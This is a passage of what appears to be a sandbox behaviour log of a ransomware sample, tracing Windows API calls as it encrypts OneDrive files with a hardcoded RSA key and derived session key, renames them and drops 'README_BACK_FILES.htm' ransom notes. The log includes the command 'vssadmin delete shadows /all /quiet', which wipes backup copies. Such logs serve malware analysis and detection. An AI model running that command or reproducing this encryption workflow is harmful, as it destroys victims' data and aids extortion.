(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0287.675] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0287.677] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0287.677] CryptDestroyKey (hKey=0x2fc388) returned 1 [0287.677] CryptReleaseContext (hProv=0x2f20180, dwFlags=0x0) returned 1 [0287.677] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0287.677] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0287.677] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\readme_back_files.htm")) returned 0xffffffff [0287.677] AreFileApisANSI () returned 1 [0287.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0287.677] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0287.678] GetFileType (hFile=0x5d80) returned 0x1 [0287.678] WriteFile (in: hFile=0x5d80, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0287.679] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0287.679] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\platforms\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0287.680] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.680] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.680] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0287.680] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0287.680] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\platforms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\platforms\\readme_back_files.htm")) returned 0xffffffff [0287.680] AreFileApisANSI () returned 1 [0287.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0287.680] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\platforms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\platforms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0287.682] GetFileType (hFile=0x5d80) returned 0x1 [0287.682] WriteFile (in: hFile=0x5d80, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0287.683] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0287.683] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0287.684] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.684] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0287.684] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0287.684] GetLastError () returned 0x0 [0287.684] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\prs-af\\filesync.localizedresources.dll.mui")) returned 0x20 [0287.685] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0287.685] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\prs-af\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0287.686] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\prs-af\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0287.689] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\prs-af\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0287.690] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1fed8) returned 1 [0287.692] CryptCreateHash (in: hProv=0x2f1fed8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0287.692] lstrlenA (lpString="ZKgxkgBnwFXjXLqFNYOPgIIdzMlQm") returned 29 [0287.692] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0287.692] CryptDeriveKey (in: hProv=0x2f1fed8, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc948) returned 1 [0287.692] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0287.692] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0287.692] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f5d0) returned 1 [0287.693] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f5d0, dwCertEncodingType=0x1, pInfo=0x2f39520*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f39550*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f39558*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc1c8) returned 1 [0287.693] CryptEncrypt (in: hKey=0x2fc1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0287.693] CryptEncrypt (in: hKey=0x2fc1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ff60*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1ff60*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0287.693] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1ff60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1ff60*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0287.694] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.736] CryptEncrypt (in: hKey=0x2fc948, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.736] WriteFile (hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) Thread: id = 43 os_tid = 0x7f8 Thread: id = 44 os_tid = 0x7f4 Process: id = "8" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6f4bc000" os_pid = "0x788" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 816 start_va = 0x7feac000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feac000" filename = "" Region: id = 817 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 818 start_va = 0x9d6df0000 end_va = 0x9d6e0ffff entry_point = 0x0 region_type = private name = "private_0x00000009d6df0000" filename = "" Region: id = 819 start_va = 0x9d6e10000 end_va = 0x9d6e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d6e10000" filename = "" Region: id = 820 start_va = 0x9d6e30000 end_va = 0x9d6e6ffff entry_point = 0x0 region_type = private name = "private_0x00000009d6e30000" filename = "" Region: id = 821 start_va = 0x7df5ff700000 end_va = 0x7ff5ff6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff700000" filename = "" Region: id = 822 start_va = 0x7ff612310000 end_va = 0x7ff612332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff612310000" filename = "" Region: id = 823 start_va = 0x7ff61233d000 end_va = 0x7ff61233efff entry_point = 0x0 region_type = private name = "private_0x00007ff61233d000" filename = "" Region: id = 824 start_va = 0x7ff61233f000 end_va = 0x7ff61233ffff entry_point = 0x0 region_type = private name = "private_0x00007ff61233f000" filename = "" Region: id = 825 start_va = 0x7ff612a70000 end_va = 0x7ff612a80fff entry_point = 0x7ff612a70000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 826 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 827 start_va = 0x9d6f70000 end_va = 0x9d706ffff entry_point = 0x0 region_type = private name = "private_0x00000009d6f70000" filename = "" Region: id = 828 start_va = 0x7ffa4ad20000 end_va = 0x7ffa4aefcfff entry_point = 0x7ffa4ad20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 829 start_va = 0x7ffa4d300000 end_va = 0x7ffa4d3acfff entry_point = 0x7ffa4d300000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 830 start_va = 0x9d6df0000 end_va = 0x9d6dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d6df0000" filename = "" Region: id = 831 start_va = 0x9d6e70000 end_va = 0x9d6f2dfff entry_point = 0x9d6e70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 832 start_va = 0x9d6f30000 end_va = 0x9d6f6ffff entry_point = 0x0 region_type = private name = "private_0x00000009d6f30000" filename = "" Region: id = 833 start_va = 0x7ff612210000 end_va = 0x7ff61230ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff612210000" filename = "" Region: id = 834 start_va = 0x7ff61233b000 end_va = 0x7ff61233cfff entry_point = 0x0 region_type = private name = "private_0x00007ff61233b000" filename = "" Region: id = 835 start_va = 0x7ffa4b3b0000 end_va = 0x7ffa4b44cfff entry_point = 0x7ffa4b3b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 836 start_va = 0x9d6e00000 end_va = 0x9d6e06fff entry_point = 0x0 region_type = private name = "private_0x00000009d6e00000" filename = "" Region: id = 837 start_va = 0x9d7070000 end_va = 0x9d7070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d7070000" filename = "" Region: id = 838 start_va = 0x9d7080000 end_va = 0x9d7086fff entry_point = 0x0 region_type = private name = "private_0x00000009d7080000" filename = "" Region: id = 839 start_va = 0x9d7110000 end_va = 0x9d711ffff entry_point = 0x0 region_type = private name = "private_0x00000009d7110000" filename = "" Region: id = 840 start_va = 0x7ffa3f7a0000 end_va = 0x7ffa3f7f2fff entry_point = 0x7ffa3f7a0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 841 start_va = 0x7ffa46de0000 end_va = 0x7ffa46f62fff entry_point = 0x7ffa46de0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 842 start_va = 0x7ffa4af60000 end_va = 0x7ffa4afbafff entry_point = 0x7ffa4af60000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 843 start_va = 0x7ffa4b070000 end_va = 0x7ffa4b1f4fff entry_point = 0x7ffa4b070000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 844 start_va = 0x7ffa4b200000 end_va = 0x7ffa4b235fff entry_point = 0x7ffa4b200000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 845 start_va = 0x7ffa4b250000 end_va = 0x7ffa4b39dfff entry_point = 0x7ffa4b250000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 846 start_va = 0x7ffa4b520000 end_va = 0x7ffa4b67bfff entry_point = 0x7ffa4b520000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 847 start_va = 0x7ffa4b680000 end_va = 0x7ffa4b7c0fff entry_point = 0x7ffa4b680000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 848 start_va = 0x7ffa4b840000 end_va = 0x7ffa4babbfff entry_point = 0x7ffa4b840000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 849 start_va = 0x7ffa4d460000 end_va = 0x7ffa4d585fff entry_point = 0x7ffa4d460000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 850 start_va = 0x7ffa4d7d0000 end_va = 0x7ffa4d88dfff entry_point = 0x7ffa4d7d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 851 start_va = 0x9d7090000 end_va = 0x9d7090fff entry_point = 0x0 region_type = private name = "private_0x00000009d7090000" filename = "" Region: id = 852 start_va = 0x9d70a0000 end_va = 0x9d70a0fff entry_point = 0x0 region_type = private name = "private_0x00000009d70a0000" filename = "" Region: id = 853 start_va = 0x9d70b0000 end_va = 0x9d70effff entry_point = 0x0 region_type = private name = "private_0x00000009d70b0000" filename = "" Region: id = 854 start_va = 0x9d7120000 end_va = 0x9d72a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d7120000" filename = "" Region: id = 855 start_va = 0x9d72b0000 end_va = 0x9d7430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d72b0000" filename = "" Region: id = 856 start_va = 0x9d7440000 end_va = 0x9d883ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d7440000" filename = "" Region: id = 857 start_va = 0x9d88f0000 end_va = 0x9d88fffff entry_point = 0x0 region_type = private name = "private_0x00000009d88f0000" filename = "" Region: id = 858 start_va = 0x7ff612339000 end_va = 0x7ff61233afff entry_point = 0x0 region_type = private name = "private_0x00007ff612339000" filename = "" Region: id = 859 start_va = 0x7ffa4a2c0000 end_va = 0x7ffa4a2d2fff entry_point = 0x7ffa4a2c0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 860 start_va = 0x7ffa4a2e0000 end_va = 0x7ffa4a329fff entry_point = 0x7ffa4a2e0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 861 start_va = 0x7ffa4a350000 end_va = 0x7ffa4a35efff entry_point = 0x7ffa4a350000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 862 start_va = 0x7ffa4a410000 end_va = 0x7ffa4a4c2fff entry_point = 0x7ffa4a410000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 863 start_va = 0x7ffa4a6a0000 end_va = 0x7ffa4acc7fff entry_point = 0x7ffa4a6a0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 864 start_va = 0x7ffa4bac0000 end_va = 0x7ffa4bb10fff entry_point = 0x7ffa4bac0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 865 start_va = 0x7ffa4bb20000 end_va = 0x7ffa4d044fff entry_point = 0x7ffa4bb20000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 866 start_va = 0x7ffa4d3b0000 end_va = 0x7ffa4d455fff entry_point = 0x7ffa4d3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 867 start_va = 0x7ffa48b90000 end_va = 0x7ffa48c25fff entry_point = 0x7ffa48b90000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 868 start_va = 0x9d70f0000 end_va = 0x9d70f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d70f0000" filename = "" Region: id = 869 start_va = 0x9d8900000 end_va = 0x9d8a15fff entry_point = 0x0 region_type = private name = "private_0x00000009d8900000" filename = "" Region: id = 870 start_va = 0x9d8ad0000 end_va = 0x9d8adffff entry_point = 0x0 region_type = private name = "private_0x00000009d8ad0000" filename = "" Region: id = 871 start_va = 0x9d8ae0000 end_va = 0x9d8cf9fff entry_point = 0x0 region_type = private name = "private_0x00000009d8ae0000" filename = "" Region: id = 872 start_va = 0x9d8d00000 end_va = 0x9d8f16fff entry_point = 0x0 region_type = private name = "private_0x00000009d8d00000" filename = "" Region: id = 873 start_va = 0x9d8f20000 end_va = 0x9d9132fff entry_point = 0x0 region_type = private name = "private_0x00000009d8f20000" filename = "" Region: id = 874 start_va = 0x9d9140000 end_va = 0x9d924afff entry_point = 0x0 region_type = private name = "private_0x00000009d9140000" filename = "" Region: id = 875 start_va = 0x9d9250000 end_va = 0x9d9307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d9250000" filename = "" Region: id = 876 start_va = 0x7ffa48330000 end_va = 0x7ffa48351fff entry_point = 0x7ffa48330000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 877 start_va = 0x7ffa48880000 end_va = 0x7ffa48892fff entry_point = 0x7ffa48880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 878 start_va = 0x7ffa49a70000 end_va = 0x7ffa49ac7fff entry_point = 0x7ffa49a70000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 879 start_va = 0x9d7100000 end_va = 0x9d7106fff entry_point = 0x0 region_type = private name = "private_0x00000009d7100000" filename = "" Region: id = 880 start_va = 0x9d8840000 end_va = 0x9d8844fff entry_point = 0x9d8840000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 881 start_va = 0x9d8850000 end_va = 0x9d8850fff entry_point = 0x9d8850000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 882 start_va = 0x9d8860000 end_va = 0x9d8861fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d8860000" filename = "" Region: id = 883 start_va = 0x9d9310000 end_va = 0x9d9505fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d9310000" filename = "" Region: id = 884 start_va = 0x7ffa42830000 end_va = 0x7ffa42aa3fff entry_point = 0x7ffa42830000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 885 start_va = 0x9d8870000 end_va = 0x9d8870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d8870000" filename = "" Region: id = 886 start_va = 0x9d8880000 end_va = 0x9d8881fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000009d8880000" filename = "" Region: id = 887 start_va = 0x7ffa4a110000 end_va = 0x7ffa4a17afff entry_point = 0x7ffa4a110000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 28 os_tid = 0x55c Thread: id = 29 os_tid = 0x130 Thread: id = 30 os_tid = 0x254 Thread: id = 31 os_tid = 0x260 Thread: id = 48 os_tid = 0x898 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3f71e000" os_pid = "0x36c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "cmd /c vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1072 start_va = 0x8c0000 end_va = 0x90ffff entry_point = 0x8c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1073 start_va = 0xee0000 end_va = 0x4edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 1074 start_va = 0x4ee0000 